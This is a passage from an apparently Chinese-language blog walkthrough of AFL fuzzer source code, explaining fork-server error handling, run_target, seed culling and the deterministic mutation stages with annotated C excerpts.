&amp;status, 0) &lt;= 0) PFATAL(&quot;waitpid() failed&quot;); if (WIFSIGNALED(status)) &#123; if (mem_limit &amp;&amp; mem_limit &lt; 500 &amp;&amp; uses_asan) &#123; SAYF(&quot;\\n&quot; cLRD &quot;[-] &quot; cRST &quot;Whoops, the target binary crashed suddenly, before receiving any input\\n&quot; &quot; from the fuzzer! Since it seems to be built with ASAN and you have a\\n&quot; &quot; restrictive memory limit configured, this is expected; please read\\n&quot; &quot; %s/notes_for_asan.txt for help.\\n&quot;, doc_path); &#125; else if (!mem_limit) &#123; SAYF(&quot;\\n&quot; cLRD &quot;[-] &quot; cRST &quot;Whoops, the target binary crashed suddenly, before receiving any input\\n&quot; &quot; from the fuzzer! There are several probable explanations:\\n\\n&quot; &quot; - The binary is just buggy and explodes entirely on its own. If so, you\\n&quot; &quot; need to fix the underlying problem or find a better replacement.\\n\\n&quot;#ifdef __APPLE__ &quot; - On MacOS X, the semantics of fork() syscalls are non-standard and may\\n&quot; &quot; break afl-fuzz performance optimizations when running platform-specific\\n&quot; &quot; targets. To fix this, set AFL_NO_FORKSRV=1 in the environment.\\n\\n&quot;#endif /* __APPLE__ */ &quot; - Less likely, there is a horrible bug in the fuzzer. If other options\\n&quot; &quot; fail, poke &lt;lcamtuf@coredump.cx&gt; for troubleshooting tips.\\n&quot;); &#125; else &#123; SAYF(&quot;\\n&quot; cLRD &quot;[-] &quot; cRST &quot;Whoops, the target binary crashed suddenly, before receiving any input\\n&quot; &quot; from the fuzzer! There are several probable explanations:\\n\\n&quot; &quot; - The current memory limit (%s) is too restrictive, causing the\\n&quot; &quot; target to hit an OOM condition in the dynamic linker. Try bumping up\\n&quot; &quot; the limit with the -m setting in the command line. A simple way confirm\\n&quot; &quot; this diagnosis would be:\\n\\n&quot;#ifdef RLIMIT_AS &quot; ( ulimit -Sv $[%llu &lt;&lt; 10]; /path/to/fuzzed_app )\\n\\n&quot;#else &quot; ( ulimit -Sd $[%llu &lt;&lt; 10]; /path/to/fuzzed_app )\\n\\n&quot;#endif /* ^RLIMIT_AS */ &quot; Tip: you can use http://jwilk.net/software/recidivm to quickly\\n&quot; &quot; estimate the required amount of virtual memory for the binary.\\n\\n&quot; &quot; - The binary is just buggy and explodes entirely on its own. If so, you\\n&quot; &quot; need to fix the underlying problem or find a better replacement.\\n\\n&quot;#ifdef __APPLE__ &quot; - On MacOS X, the semantics of fork() syscalls are non-standard and may\\n&quot; &quot; break afl-fuzz performance optimizations when running platform-specific\\n&quot; &quot; targets. To fix this, set AFL_NO_FORKSRV=1 in the environment.\\n\\n&quot;#endif /* __APPLE__ */ &quot; - Less likely, there is a horrible bug in the fuzzer. If other options\\n&quot; &quot; fail, poke &lt;lcamtuf@coredump.cx&gt; for troubleshooting tips.\\n&quot;, DMS(mem_limit &lt;&lt; 20), mem_limit - 1); &#125; FATAL(&quot;Fork server crashed with signal %d&quot;, WTERMSIG(status)); &#125; if (*(u32 *)trace_bits == EXEC_FAIL_SIG) FATAL(&quot;Unable to execute target application (&#x27;%s&#x27;)&quot;, argv[0]); if (mem_limit &amp;&amp; mem_limit &lt; 500 &amp;&amp; uses_asan) &#123; SAYF(&quot;\\n&quot; cLRD &quot;[-] &quot; cRST &quot;Hmm, looks like the target binary terminated before we could complete a\\n&quot; &quot; handshake with the injected code. Since it seems to be built with ASAN and\\n&quot; &quot; you have a restrictive memory limit configured, this is expected; please\\n&quot; &quot; read %s/notes_for_asan.txt for help.\\n&quot;, doc_path); &#125; else if (!mem_limit) &#123; SAYF(&quot;\\n&quot; cLRD &quot;[-] &quot; cRST &quot;Hmm, looks like the target binary terminated before we could complete a\\n&quot; &quot; handshake with the injected code. Perhaps there is a horrible bug in the\\n&quot; &quot; fuzzer. Poke &lt;lcamtuf@coredump.cx&gt; for troubleshooting tips.\\n&quot;); &#125; else &#123; SAYF(&quot;\\n&quot; cLRD &quot;[-] &quot; cRST &quot;Hmm, looks like the target binary terminated before we could complete a\\n&quot; &quot; handshake with the injected code. There are %s probable explanations:\\n\\n&quot; &quot;%s&quot; &quot; - The current memory limit (%s) is too restrictive, causing an OOM\\n&quot; &quot; fault in the dynamic linker. This can be fixed with the -m option. A\\n&quot; &quot; simple way to confirm the diagnosis may be:\\n\\n&quot;#ifdef RLIMIT_AS &quot; ( ulimit -Sv $[%llu &lt;&lt; 10]; /path/to/fuzzed_app )\\n\\n&quot;#else &quot; ( ulimit -Sd $[%llu &lt;&lt; 10]; /path/to/fuzzed_app )\\n\\n&quot;#endif /* ^RLIMIT_AS */ &quot; Tip: you can use http://jwilk.net/software/recidivm to quickly\\n&quot; &quot; estimate the required amount of virtual memory for the binary.\\n\\n&quot; &quot; - Less likely, there is a horrible bug in the fuzzer. If other options\\n&quot; &quot; fail, poke &lt;lcamtuf@coredump.cx&gt; for troubleshooting tips.\\n&quot;, getenv(DEFER_ENV_VAR) ? &quot;three&quot; : &quot;two&quot;, getenv(DEFER_ENV_VAR) ? &quot; - You are using deferred forkserver, but __AFL_INIT() is never\\n&quot; &quot; reached before the program terminates.\\n\\n&quot; : &quot;&quot;, DMS(mem_limit &lt;&lt; 20), mem_limit - 1); &#125; FATAL(&quot;Fork server handshake failed&quot;);&#125; run_target 用来运行一次目标 首先初始化了trace_bits，并设置了内存屏障 123456789101112131415161718static u8 run_target(char **argv, u32 timeout)&#123; static struct itimerval it; static u32 prev_timed_out = 0; static u64 exec_ms = 0; int status = 0; u32 tb4; child_timed_out = 0; /* After this memset, trace_bits[] are effectively volatile, so we must prevent any earlier operations from venturing into that territory. */ memset(trace_bits, 0, MAP_SIZE); MEM_BARRIER(); 如果是dump_mode 并且没有forkserver， 就需要先类似init_forkserver 中的部分操作，来创建子进程 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182 if (dumb_mode == 1 || no_forkserver) &#123; child_pid = fork(); if (child_pid &lt; 0) PFATAL(&quot;fork() failed&quot;); if (!child_pid) &#123; struct rlimit r; if (mem_limit) &#123; r.rlim_max = r.rlim_cur = ((rlim_t)mem_limit) &lt;&lt; 20;#ifdef RLIMIT_AS setrlimit(RLIMIT_AS, &amp;r); /* Ignore errors */#else setrlimit(RLIMIT_DATA, &amp;r); /* Ignore errors */#endif /* ^RLIMIT_AS */ &#125; r.rlim_max = r.rlim_cur = 0; setrlimit(RLIMIT_CORE, &amp;r); /* Ignore errors */ /* Isolate the process and configure standard descriptors. If out_file is specified, stdin is /dev/null; otherwise, out_fd is cloned instead. */ setsid(); dup2(dev_null_fd, 1); dup2(dev_null_fd, 2); if (out_file) &#123; dup2(dev_null_fd, 0); &#125; else &#123; dup2(out_fd, 0); close(out_fd); &#125; /* On Linux, would be faster to use O_CLOEXEC. Maybe TODO. */ close(dev_null_fd); close(out_dir_fd); close(dev_urandom_fd); close(fileno(plot_file)); /* Set sane defaults for ASAN if nothing else specified. */ setenv(&quot;ASAN_OPTIONS&quot;, &quot;abort_on_error=1:&quot; &quot;detect_leaks=0:&quot; &quot;symbolize=0:&quot; &quot;allocator_may_return_null=1&quot;, 0); setenv(&quot;MSAN_OPTIONS&quot;, &quot;exit_code=&quot; STRINGIFY(MSAN_ERROR) &quot;:&quot; &quot;symbolize=0:&quot; &quot;msan_track_origins=0&quot;, 0); execv(target_path, argv); /* Use a distinctive bitmap value to tell the parent about execv() falling through. */ *(u32 *)trace_bits = EXEC_FAIL_SIG; exit(0); &#125; &#125; 反之如果在 非dump mode，那么通过控制管道通知子进程运行，并获取其pid 123456789101112131415161718192021222324252627 else &#123; s32 res; /* In non-dumb mode, we have the fork server up and running, so simply tell it to have at it, and then read back PID. */ if ((res = write(fsrv_ctl_fd, &amp;prev_timed_out, 4)) != 4) &#123; // 向forkserver发送消息 if (stop_soon) return 0; RPFATAL(res, &quot;Unable to request new process from fork server (OOM?)&quot;); &#125; if ((res = read(fsrv_st_fd, &amp;child_pid, 4)) != 4) &#123;// 接受子进程pid if (stop_soon) return 0; RPFATAL(res, &quot;Unable to request new process from fork server (OOM?)&quot;); &#125; if (child_pid &lt;= 0) FATAL(&quot;Fork server is misbehaving (OOM?)&quot;); &#125; 设置timeout 1234it.it_value.tv_sec = (timeout / 1000);it.it_value.tv_usec = (timeout % 1000) * 1000;setitimer(ITIMER_REAL, &amp;it, NULL); 阻塞，等待子进程运行结束 1234567891011121314151617181920 if (dumb_mode == 1 || no_forkserver) &#123;// 如果在dumpmode，通过waitpid阻塞 if (waitpid(child_pid, &amp;status, 0) &lt;= 0) PFATAL(&quot;waitpid() failed&quot;); &#125; else &#123; s32 res; // 如果存在forkserver // 通过读管道阻塞 if ((res = read(fsrv_st_fd, &amp;status, 4)) != 4) &#123; if (stop_soon) return 0; RPFATAL(res, &quot;Unable to communicate with fork server (OOM?)&quot;); &#125; &#125; 接下来根据子进程返回的status，进行对应的错误处理 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465 if (!WIFSTOPPED(status)) child_pid = 0; getitimer(ITIMER_REAL, &amp;it); exec_ms = (u64)timeout - (it.it_value.tv_sec * 1000 + it.it_value.tv_usec / 1000); // 计算运行时间 it.it_value.tv_sec = 0; it.it_value.tv_usec = 0; setitimer(ITIMER_REAL, &amp;it, NULL); total_execs++; // 总运行次数加一 /* Any subsequent operations on trace_bits must not be moved by the compiler below this point. Past this location, trace_bits[] behave very normally and do not have to be treated as volatile. */ MEM_BARRIER(); tb4 = *(u32 *)trace_bits; #ifdef WORD_SIZE_64 classify_counts((u64 *)trace_bits);#else classify_counts((u32 *)trace_bits);#endif /* ^WORD_SIZE_64 */ prev_timed_out = child_timed_out; /* Report outcome to caller. */ if (WIFSIGNALED(status) &amp;&amp; !stop_soon) &#123; // 根据信号判断错误类型 kill_signal = WTERMSIG(status); if (child_timed_out &amp;&amp; kill_signal == SIGKILL) return FAULT_TMOUT; return FAULT_CRASH; &#125; /* A somewhat nasty hack for MSAN, which doesn&#x27;t support abort_on_error and must use a special exit code. */ if (uses_asan &amp;&amp; WEXITSTATUS(status) == MSAN_ERROR) &#123; // 根据exitstatus判断错误类型 kill_signal = 0; return FAULT_CRASH; &#125; if ((dumb_mode == 1 || no_forkserver) &amp;&amp; tb4 == EXEC_FAIL_SIG) return FAULT_ERROR; /* It makes sense to account for the slowest units only if the testcase was run under the user defined timeout. */ if (!(timeout &gt; exec_tmout) &amp;&amp; (slowest_exec_ms &lt; exec_ms)) &#123; slowest_exec_ms = exec_ms; &#125; // 如果顺利运行到最后，说明没有错误 return FAULT_NONE;&#125; update_bitmap_score 这部分涉及到了AFL维护的一个static struct queue_entry *top_rated[MAP_SIZE] 数组，这个数组记录了每个bitmap中的一项（也就是每个基本块）对应的最favored的testcase。 这个favored score由执行时间和长度相乘得到。 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849static void update_bitmap_score(struct queue_entry *q)&#123; u32 i; u64 fav_factor = q-&gt;exec_us * q-&gt;len; /* For every byte set in trace_bits[], see if there is a previous winner, and how it compares to us. */ for (i = 0; i &lt; MAP_SIZE; i++) if (trace_bits[i]) &#123; if (top_rated[i]) &#123; /* Faster-executing or smaller test cases are favored. */ // favored score由执行时间和长度相乘得到。越小越好 if (fav_factor &gt; top_rated[i]-&gt;exec_us * top_rated[i]-&gt;len) continue; /* Looks like we&#x27;re going to win. Decrease ref count for the previous winner, discard its trace_bits[] if necessary. */ if (!--top_rated[i]-&gt;tc_ref) &#123; ck_free(top_rated[i]-&gt;trace_mini); top_rated[i]-&gt;trace_mini = 0; &#125; &#125; /* Insert ourselves as the new winner. */ top_rated[i] = q; q-&gt;tc_ref++; // 如果更favored，则更新top_rated数组 if (!q-&gt;trace_mini) &#123; q-&gt;trace_mini = ck_alloc(MAP_SIZE &gt;&gt; 3); minimize_bits(q-&gt;trace_mini, trace_bits); // 压缩trace_bits为bitmap &#125; score_changed = 1; // 设置flag为1 &#125;&#125; cull_queue | 挑选更好的种子 此函数通过标记更favored 的种子，使得favored的种子得到更大的运行概率 123456789101112131415161718static void cull_queue(void)&#123; struct queue_entry *q; static u8 temp_v[MAP_SIZE &gt;&gt; 3]; u32 i; if (dumb_mode || !score_changed) return; score_changed = 0; memset(temp_v, 255, MAP_SIZE &gt;&gt; 3); queued_favored = 0; pending_favored = 0; q = queue; 首先清空每个queue实体的favored 12345while (q)&#123; q-&gt;favored = 0; q = q-&gt;next;&#125; tmep_v数组用来标识没有遍历到的区域，以下循环将所有存在不同分支的种子筛选出来， 1234567891011121314151617181920 for (i = 0; i &lt; MAP_SIZE; i++) if (top_rated[i] &amp;&amp; (temp_v[i &gt;&gt; 3] &amp; (1 &lt;&lt; (i &amp; 7)))) &#123;// 判断favored种子遍历的区域，是否已经在之前筛选出了（将对应的temp_v置为0了） u32 j = MAP_SIZE &gt;&gt; 3; /* Remove all bits belonging to the current entry from temp_v. */ // 然后将所有当前种子遍历过的区域从temp_v中去除 while (j--) if (top_rated[i]-&gt;trace_mini[j]) temp_v[j] &amp;= ~top_rated[i]-&gt;trace_mini[j]; top_rated[i]-&gt;favored = 1; // 然后增加其favored值 queued_favored++; if (!top_rated[i]-&gt;was_fuzzed) pending_favored++; &#125; 123456789q = queue;// 对于不favored的，通过创建redundant文件的方式表明此种子是多余的while (q)&#123; mark_as_redundant(q, !q-&gt;favored); q = q-&gt;next;&#125; fuzz_one | 种子的变异 此函数用于从queue中选取一个种子，对种子进行变异，返回0说明运行成功，否则运行失败 首先进行了一些细节的处理, 包括: 首先判断是否要跳过当前testcase给favored的testcase更多运行机会 如果存在 pending_favored ， 并且当前queue已经运行过或者不favored，那么为了将时间留给pending_favored的testcase, 有99%的几率直接跳过当前种子 如果无pending_favored， 对于不是favored的testcase, 如果已经fuzz过, 95%概率跳过, 如果没有fuzz过, 75%概率跳过 如果是favored， 不跳过 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889909192static u8 fuzz_one(char **argv)&#123; s32 len, fd, temp_len, i, j; u8 *in_buf, *out_buf, *orig_in, *ex_tmp, *eff_map = 0; u64 havoc_queued, orig_hit_cnt, new_hit_cnt; u32 splice_cycle = 0, perf_score = 100, orig_perf, prev_cksum, eff_cnt = 1; u8 ret_val = 1, doing_det = 0; u8 a_collect[MAX_AUTO_EXTRA]; u32 a_len = 0;#ifdef IGNORE_FINDS /* In IGNORE_FINDS mode, skip any entries that weren&#x27;t in the initial data set. */ if (queue_cur-&gt;depth &gt; 1) return 1;#else if (pending_favored) &#123; /* If we have any favored, non-fuzzed new arrivals in the queue, possibly skip to them at the expense of already-fuzzed or non-favored cases. */ if ((queue_cur-&gt;was_fuzzed || !queue_cur-&gt;favored) &amp;&amp; UR(100) &lt; SKIP_TO_NEW_PROB) return 1; &#125; else if (!dumb_mode &amp;&amp; !queue_cur-&gt;favored &amp;&amp; queued_paths &gt; 10) &#123; /* Otherwise, still possibly skip non-favored cases, albeit less often. The odds of skipping stuff are higher for already-fuzzed inputs and lower for never-fuzzed entries. */ if (queue_cycle &gt; 1 &amp;&amp; !queue_cur-&gt;was_fuzzed) &#123; if (UR(100) &lt; SKIP_NFAV_NEW_PROB) // random(0, 100) &lt; 75 ; 75% return 1; &#125; else &#123; if (UR(100) &lt; SKIP_NFAV_OLD_PROB) // random(0, 100) &lt; 95 ; 95% return 1; &#125; &#125; // 判断需要跳过的情形#endif /* ^IGNORE_FINDS */ if (not_on_tty) &#123; ACTF(&quot;Fuzzing test case #%u (%u total, %llu uniq crashes found)...&quot;, current_entry, queued_paths, unique_crashes); fflush(stdout); &#125; /* Map the test case into memory. */ // 将testcase映射进内存 fd = open(queue_cur-&gt;fname, O_RDONLY); if (fd &lt; 0) PFATAL(&quot;Unable to open &#x27;%s&#x27;&quot;, queue_cur-&gt;fname); len = queue_cur-&gt;len; orig_in = in_buf = mmap(0, len, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0); if (orig_in == MAP_FAILED) PFATAL(&quot;Unable to mmap &#x27;%s&#x27;&quot;, queue_cur-&gt;fname); close(fd); /* We could mmap() out_buf as MAP_PRIVATE, but we end up clobbering every single byte anyway, so it wouldn&#x27;t give us any performance or memory usage benefits. */ out_buf = ck_alloc_nozero(len); subseq_tmouts = 0; cur_depth = queue_cur-&gt;depth; 如果之前cal_failed， 那么要再运行一次 calibrate_case 来校准testcase 1234567891011121314151617181920212223242526if (queue_cur-&gt;cal_failed)&#123; u8 res = FAULT_TMOUT; if (queue_cur-&gt;cal_failed &lt; CAL_CHANCES) &#123; /* Reset exec_cksum to tell calibrate_case to re-execute the testcase avoiding the usage of an invalid trace_bits. For more info: https://github.com/AFLplusplus/AFLplusplus/pull/425 */ queue_cur-&gt;exec_cksum = 0; res = calibrate_case(argv, queue_cur, in_buf, queue_cycle - 1, 0); if (res == FAULT_ERROR) FATAL(&quot;Unable to execute target application&quot;); &#125; if (stop_soon || res != crash_mode) &#123; cur_skipped_paths++; goto abandon_entry; &#125;&#125; 接下来通过trim_case 来修剪并运行testcase 1234567891011121314151617181920212223if (!dumb_mode &amp;&amp; !queue_cur-&gt;trim_done)&#123; u8 res = trim_case(argv, queue_cur, in_buf); if (res == FAULT_ERROR) FATAL(&quot;Unable to execute target application&quot;); if (stop_soon) &#123; cur_skipped_paths++; goto abandon_entry; &#125; /* Don&#x27;t retry trimming, even if it failed. */ queue_cur-&gt;trim_done = 1; if (len != queue_cur-&gt;len) len = queue_cur-&gt;len;&#125;memcpy(out_buf, in_buf, len); 通过calculate_score 计算分数 1orig_perf = perf_score = calculate_score(queue_cur); 接下来进入真正的变异阶段 确定性变异 首先判断是否需要跳过确定性(deterministic)变异阶段，这部分变异没有随机性，是所有种子都要经历的阶段 12345678910if (skip_deterministic || queue_cur-&gt;was_fuzzed || queue_cur-&gt;passed_det) goto havoc_stage;/* Skip deterministic fuzzing if exec path checksum puts this out of scope for this master instance. */if (master_max &amp;&amp; (queue_cur-&gt;exec_cksum % master_max) != master_id - 1) goto havoc_stage;doing_det = 1; deterministic 阶段分为以下几个部分： bitflip bitflip阶段是对于testcase的bit位进行翻转 bitflip 1/1 通过每次翻转一个bit，来检查是否具有类似于 “ELF” 此类魔数。 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768 stage_short = &quot;flip1&quot;; stage_max = len &lt;&lt; 3; stage_name = &quot;bitflip 1/1&quot;; stage_val_type = STAGE_VAL_NONE; orig_hit_cnt = queued_paths + unique_crashes; prev_cksum = queue_cur-&gt;exec_cksum; for (stage_cur = 0; stage_cur &lt; stage_max; stage_cur++) &#123; stage_cur_byte = stage_cur &gt;&gt; 3; FLIP_BIT(out_buf, stage_cur);// 每次翻转一个 bit if (common_fuzz_stuff(argv, out_buf, len)) // 运行一次fuzz测试 goto abandon_entry; FLIP_BIT(out_buf, stage_cur);// 翻转回来 if (!dumb_mode &amp;&amp; (stage_cur &amp; 7) == 7) &#123;// 根据经验，通常检查最低位的翻转最有效率 u32 cksum = hash32(trace_bits, MAP_SIZE, HASH_CONST); // 获取cksum if (stage_cur == stage_max - 1 &amp;&amp; cksum == prev_cksum) &#123; /* If at end of file and we are still collecting a string, grab the final character and force output. */ if (a_len &lt; MAX_AUTO_EXTRA) a_collect[a_len] = out_buf[stage_cur &gt;&gt; 3]; a_len++; if (a_len &gt;= MIN_AUTO_EXTRA &amp;&amp; a_len &lt;= MAX_AUTO_EXTRA) maybe_add_auto(a_collect, a_len); &#125; else if (cksum != prev_cksum) &#123; // 如果cksum不等于prev_cksum，可能是一个魔数的开始或者结束 /* Otherwise, if the checksum has changed, see if we have something worthwhile queued up, and collect that if the answer is yes. */ if (a_len &gt;= MIN_AUTO_EXTRA &amp;&amp; a_len &lt;= MAX_AUTO_EXTRA) maybe_add_auto(a_collect, a_len); // 如果是一个魔数的结束 // 那么调用 may_add_auto收集起来 a_len = 0; prev_cksum = cksum; &#125; /* Continue collecting string, but only if the bit flip actually made any difference - we don&#x27;t want no-op tokens. */ if (cksum != queue_cur-&gt;exec_cksum) &#123; // 需要cksum不等于原来才需要增加a_len并记录 if (a_len &lt; MAX_AUTO_EXTRA) a_collect[a_len] = out_buf[stage_cur &gt;&gt; 3]; a_len++; &#125; &#125; &#125; bitflip 2/1 每次翻转两个bit，运行并保留有价值的种子 1234567891011121314151617181920212223242526stage_name = &quot;bitflip 2/1&quot;;stage_short = &quot;flip2&quot;;stage_max = (len &lt;&lt; 3) - 1;orig_hit_cnt = new_hit_cnt;for (stage_cur = 0; stage_cur &lt; stage_max; stage_cur++)&#123; stage_cur_byte = stage_cur &gt;&gt; 3; FLIP_BIT(out_buf, stage_cur); FLIP_BIT(out_buf, stage_cur + 1); // 翻转两个bit if (common_fuzz_stuff(argv, out_buf, len)) goto abandon_entry; FLIP_BIT(out_buf, stage_cur); FLIP_BIT(out_buf, stage_cur + 1);&#125;new_hit_cnt = queued_paths + unique_crashes;stage_finds[STAGE_FLIP2] += new_hit_cnt - orig_hit_cnt;stage_cycles[STAGE_FLIP2] += stage_max; bitflip 4/1 每次翻转4个bit，运行并保留有价值的种子 1234567891011121314151617181920212223242526272829stage_name = &quot;bitflip 4/1&quot;;stage_short = &quot;flip4&quot;;stage_max = (len &lt;&lt; 3) - 3;orig_hit_cnt = new_hit_cnt;for (stage_cur = 0; stage_cur &lt; stage_max; stage_cur++)&#123; stage_cur_byte = stage_cur &gt;&gt; 3; FLIP_BIT(out_buf, stage_cur); FLIP_BIT(out_buf, stage_cur + 1); FLIP_BIT(out_buf, stage_cur + 2); FLIP_BIT(out_buf, stage_cur + 3); if (common_fuzz_stuff(argv, out_buf, len)) goto abandon_entry; FLIP_BIT(out_buf, stage_cur); FLIP_BIT(out_buf, stage_cur + 1); FLIP_BIT(out_buf, stage_cur + 2); FLIP_BIT(out_buf, stage_cur + 3);&#125;new_hit_cnt = queued_paths + unique_crashes;stage_finds[STAGE_FLIP4] += new_hit_cnt - orig_hit_cnt;stage_cycles[STAGE_FLIP4] += stage_max; bitflip 8/8 每次反转一整个byte，并记录那些即使全部翻转也对执行路径没有影响的byte，避免在之后花费时间去测试 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576/* Walking byte. */stage_name = &quot;bitflip 8/8&quot;;stage_short = &quot;flip8&quot;;stage_max = len;orig_hit_cnt = new_hit_cnt;for (stage_cur = 0; stage_cur &lt; stage_max; stage_cur++)&#123; stage_cur_byte = stage_cur; out_buf[stage_cur] ^= 0xFF; // 每次翻转一个byte if (common_fuzz_stuff(argv, out_buf, len)) goto abandon_entry; // 运行测试 /* We also use this stage to pull off a simple trick: we identify bytes that seem to have no effect on the current execution path even when fully flipped - and we skip them during more expensive deterministic stages, such as arithmetics or known ints. */ if (!eff_map[EFF_APOS(stage_cur)]) &#123; u32 cksum; /* If in dumb mode or if the file is very short, just flag everything without wasting time on checksums. */ if (!dumb_mode &amp;&amp; len &gt;= EFF_MIN_LEN) cksum = hash32(trace_bits, MAP_SIZE, HASH_CONST); else cksum = ~queue_cur-&gt;exec_cksum; if (cksum != queue_cur-&gt;exec_cksum) &#123; // 用来区分一些无效byte，为后面的阶段做准备 eff_map[EFF_APOS(stage_cur)] = 1; eff_cnt++; // 通过一个eff_map 来标记有效byte &#125; &#125; out_buf[stage_cur] ^= 0xFF; // 还原byte&#125;/* If the effector map is more than EFF_MAX_PERC dense, just flag the whole thing as worth fuzzing, since we wouldn&#x27;t be saving much time anyway. */if (eff_cnt != EFF_ALEN(len) &amp;&amp; eff_cnt * 100 / EFF_ALEN(len) &gt; EFF_MAX_PERC)&#123; // 如果eff_map 大于 EFF_MAX_PERC // 那么直接把整个testcase标记为值得fuzz的，这不会多浪费多少时间 memset(eff_map, 1, EFF_ALEN(len)); blocks_eff_select += EFF_ALEN(len);&#125;else&#123; blocks_eff_select += eff_cnt;&#125;blocks_eff_total += EFF_ALEN(len);new_hit_cnt = queued_paths + unique_crashes;stage_finds[STAGE_FLIP8] += new_hit_cnt - orig_hit_cnt;stage_cycles[STAGE_FLIP8] += stage_max; 接下来是 bitflip 16/8 处理类似 12345678910111213141516171819202122232425262728293031323334if (len &lt; 2) goto skip_bitflip;stage_name = &quot;bitflip 16/8&quot;;stage_short = &quot;flip16&quot;;stage_cur = 0;stage_max = len - 1;orig_hit_cnt = new_hit_cnt;for (i = 0; i &lt; len - 1; i++) &#123; /* Let&#x27;s consult the effector map... */ if (!eff_map[EFF_APOS(i)] &amp;&amp; !eff_map[EFF_APOS(i + 1)]) &#123; stage_max--; continue; &#125; stage_cur_byte = i; *(u16*)(out_buf + i) ^= 0xFFFF; if (common_fuzz_stuff(argv, out_buf, len)) goto abandon_entry; stage_cur++; *(u16*)(out_buf + i) ^= 0xFFFF;&#125;new_hit_cnt = queued_paths + unique_crashes;stage_finds[STAGE_FLIP16] += new_hit_cnt - orig_hit_cnt;stage_cycles[STAGE_FLIP16] += stage_max; 然后是 bitflip 32/8，逻辑相同 1234567891011121314151617181920212223242526272829303132333435if (len &lt; 4) goto skip_bitflip;/* Four walking bytes. */stage_name = &quot;bitflip 32/8&quot;;stage_short = &quot;flip32&quot;;stage_cur = 0;stage_max = len - 3;orig_hit_cnt = new_hit_cnt;for (i = 0; i &lt; len - 3; i++) &#123; /* Let&#x27;s consult the effector map... */ if (!eff_map[EFF_APOS(i)] &amp;&amp; !eff_map[EFF_APOS(i + 1)] &amp;&amp; !eff_map[EFF_APOS(i + 2)] &amp;&amp; !eff_map[EFF_APOS(i + 3)]) &#123; stage_max--; continue; &#125; stage_cur_byte = i; *(u32*)(out_buf + i) ^= 0xFFFFFFFF; if (common_fuzz_stuff(argv, out_buf, len)) goto abandon_entry; stage_cur++; *(u32*)(out_buf + i) ^= 0xFFFFFFFF;&#125;new_hit_cnt = queued_paths + unique_crashes;stage_finds[STAGE_FLIP32] += new_hit_cnt - orig_hit_cnt;stage_cycles[STAGE_FLIP32] += stage_max; 以上，第一个bitflip阶段就完成了 ARITHMETIC INC/DEC 这个阶段是算数加减阶段 首先是 arith 8/8 ， 对一个byte大小的数据进行加减 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263 stage_name = &quot;arith 8/8&quot;; stage_short = &quot;arith8&quot;; stage_cur = 0; stage_max = 2 * len * ARITH_MAX; stage_val_type = STAGE_VAL_LE; orig_hit_cnt = new_hit_cnt; for (i = 0; i &lt; len; i++) &#123; u8 orig = out_buf[i]; /* Let&#x27;s consult the effector map... */ if (!eff_map[EFF_APOS(i)]) &#123; stage_max -= 2 * ARITH_MAX; continue; // 如果不是有效位置，那么就避免进行变异 &#125; stage_cur_byte = i; for (j = 1; j &lt;= ARITH_MAX; j++) &#123; // 这里的 ARITH_MAX 是35 u8 r = orig ^ (orig + j); /* Do arithmetic operations only if the result couldn&#x27;t be a product of a bitflip. */ // 并且要确保进行算术运算后的值不可以经过bitflip得到，避免重复变异 if (!could_be_bitflip(r)) &#123; stage_cur_val = j; out_buf[i] = orig + j; if (common_fuzz_stuff(argv, out_buf, len)) goto abandon_entry; stage_cur++; &#125; else stage_max--; r = orig ^ (orig - j); if (!could_be_bitflip(r)) &#123; stage_cur_val = -j; out_buf[i] = orig - j; if (common_fuzz_stuff(argv, out_buf, len)) goto abandon_entry; stage_cur++; &#125; else stage_max--; out_buf[i] = orig;// 加减法都尝试一次 &#125; &#125; new_hit_cnt = queued_paths + unique_crashes; stage_finds[STAGE_ARITH8] += new_hit_cnt - orig_hit_cnt; stage_cycles[STAGE_ARITH8] += stage_max; 然后还有 arith 16/8 arith 32/8 分别进行16位和32位的加减， 这里不过多赘述 INTERESTING VALUES 这一步主要是使用一些有意义的值来替换 首先是 interest 8/8 用interest值替换一个8位 123456789101112131415161718192021222324252627282930313233343536373839404142434445stage_name = &quot;interest 8/8&quot;;stage_short = &quot;int8&quot;;stage_cur = 0;stage_max = len * sizeof(interesting_8);stage_val_type = STAGE_VAL_LE;orig_hit_cnt = new_hit_cnt;/* Setting 8-bit integers. */for (i = 0; i &lt; len; i++) &#123; u8 orig = out_buf[i]; /* Let&#x27;s consult the effector map... */ if (!eff_map[EFF_APOS(i)]) &#123; stage_max -= sizeof(interesting_8); continue; &#125; stage_cur_byte = i; for (j = 0; j &lt; sizeof(interesting_8); j++) &#123; /* Skip if the value could be a product of bitflips or arithmetics. */ if (could_be_bitflip(orig ^ (u8)interesting_8[j]) || could_be_arith(orig, (u8)interesting_8[j], 1)) &#123; stage_max--; continue; &#125; stage_cur_val = interesting_8[j]; out_buf[i] = interesting_8[j]; if (common_fuzz_stuff(argv, out_buf, len)) goto abandon_entry; out_buf[i] = orig; stage_cur++; &#125;&#125; 同样的，还有: interest 16/8 interest 32/8 DICTIONARY STUFF 这一阶段是使用字典或者之前得到的有意义的extras替换种子的内容 首先是替换为extras 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263/******************** * DICTIONARY STUFF * ********************/if (!extras_cnt) goto skip_user_extras;/* Overwrite with user-supplied extras. */stage_name = &quot;user extras (over)&quot;;stage_short = &quot;ext_UO&quot;;stage_cur = 0;stage_max = extras_cnt * len;stage_val_type = STAGE_VAL_NONE;orig_hit_cnt = new_hit_cnt;for (i = 0; i &lt; len; i++) &#123; u32 last_len = 0; stage_cur_byte = i; /* Extras are sorted by size, from smallest to largest. This means that we don&#x27;t have to worry about restoring the buffer in between writes at a particular offset determined by the outer loop. */ for (j = 0; j &lt; extras_cnt; j++) &#123; /* Skip extras probabilistically if extras_cnt &gt; MAX_DET_EXTRAS. Also skip them if there&#x27;s no room to insert the payload, if the token is redundant, or if its entire span has no bytes set in the effector map. */ if ((extras_cnt &gt; MAX_DET_EXTRAS &amp;&amp; UR(extras_cnt) &gt;= 